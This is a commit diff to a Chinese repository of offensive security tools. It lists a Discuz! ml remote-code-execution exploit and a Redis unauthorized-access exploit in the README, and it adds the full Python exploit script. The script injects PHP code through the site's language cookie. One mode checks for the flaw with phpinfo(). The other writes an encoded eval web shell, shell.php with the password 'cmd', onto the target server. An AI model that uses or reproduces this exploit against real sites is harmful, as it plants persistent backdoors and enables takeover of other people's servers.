add Redis未授权访问漏洞利用工具&Discuz! ml RCE漏洞利用工具

README.md

@@ -440,6 +440,8 @@
 - [fofa2Xray-一款联合fofa与xray的自动化批量扫描工具,使用Golang编写，适用于windows与linux](https://github.com/piaolin/fofa2Xray)
 - [CasExp-Apereo CAS 反序列化利用工具](https://github.com/potats0/CasExp)
 - [C_Shot-shellcode远程加载器](https://github.com/anthemtotheego/C_Shot)|[相关文章](./books/C_shot–shellcode远程加载器.pdf)
+- [dz_ml_rce.py-Discuz! ml RCE漏洞利用工具](./tools/dz_ml_rce.py)
+- [Redis未授权访问漏洞利用工具](./tools/Redis_Exp-by_PANDA墨森.zip)
 
 ## <span id="head8"> 文章/书籍/教程相关</span>
 

tools/dz_ml_rce.py

@@ -0,0 +1,70 @@
+#!/usr/bin/python
+# coding=utf-8
+
+import requests
+import re
+from argparse import ArgumentParser
+
+
+class Dz_Ml_RCE:
+    def __init__(self):
+        self.headers = {
+            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
+            'Cookie': 'qbn8_2132_saltkey=Gbu6t373; qbn8_2132_language={}; qbn8_2132_lastvisit=1595902511; qbn8_2132_sid=TemWvk; qbn8_2132_lastact=1595906207%09forum.php%09; qbn8_2132_sendmail=1; qbn8_2132_onlineusernum=1;PHPSESSID=8phdj361a5d498n03tnqd7c104;'
+        }
+
+    def check(self):
+        '''漏洞检测'''
+        self.headers['Cookie'] = self.headers['Cookie'].format("\'.phpinfo().\'")
+        r = requests.get(url=result.url, headers=self.headers)
+        if re.search(r'<title>phpinfo\(\)</title>', r.text):
+            print("[*]Target Is Seem To Be Vulnerable!")
+        else:
+            print("[!]Target Is Not Seem To Be Vulnerable!")
+
+    def getshell(self):
+        shell_payload = '%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%32%25%36%33%25%36%64%25%36%34%25%32%32%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%27%29%29.%27'
+        self.headers['Cookie'] = self.headers['Cookie'].format(shell_payload)
+        r = requests.get(url=result.url, headers=self.headers)
+        if re.search(r'<title>Forum -  Powered by Discuz!</title>', r.text):
+            print("[*]Shell Create Successfully！")
+            print(f"[+]shell：在 {result.url} 同目录下的shell.php 密码：cmd")
+        else:
+            print("[!]Shell Create Failed！")
+
+    def run(self):
+        if result.func == 'check':
+            self.check()
+        elif result.func == 'shell':
+            self.getshell()
+        else:
+            print("[!]请选择正确的功能：check(漏洞检测)/shell(直接getshell)！")
+
+
+def main():
+    if not result.func:
+        print("[!]请先使用-f指定可选的功能：check(漏洞检测)/getshell(直接getshell)")
+        return
+    else:
+        Dz_Ml_RCE().run()
+
+
+if __name__ == '__main__':
+    show = '''
+      _____      _   __  __ _        _____   _____ ______ 
+     |  __ \    | | |  \/  | |      |  __ \ / ____|  ____|
+     | |  | |___| | | \  / | |      | |__) | |    | |__   
+     | |  | |_  / | | |\/| | |      |  _  /| |    |  __|  
+     | |__| |/ /|_| | |  | | |____  | | \ \| |____| |____ 
+     |_____//___(_) |_|  |_|______| |_|  \_\\_____|______|
+                                ______                    
+                               |______|       
+                               
+                                            By PANDA墨森            
+    '''
+    print(show + '\n'*2)
+    arg = ArgumentParser(description='Dz_Ml_RCE By PANDA墨森')
+    arg.add_argument('url', help='目标url，eag：http://www.xxx.com/discuz/upload/forum.php')
+    arg.add_argument('-f', '--func', help='可选的功能：check(漏洞检测)/shell(直接getshell)', dest='func', type=str)
+    result = arg.parse_args()
+    main()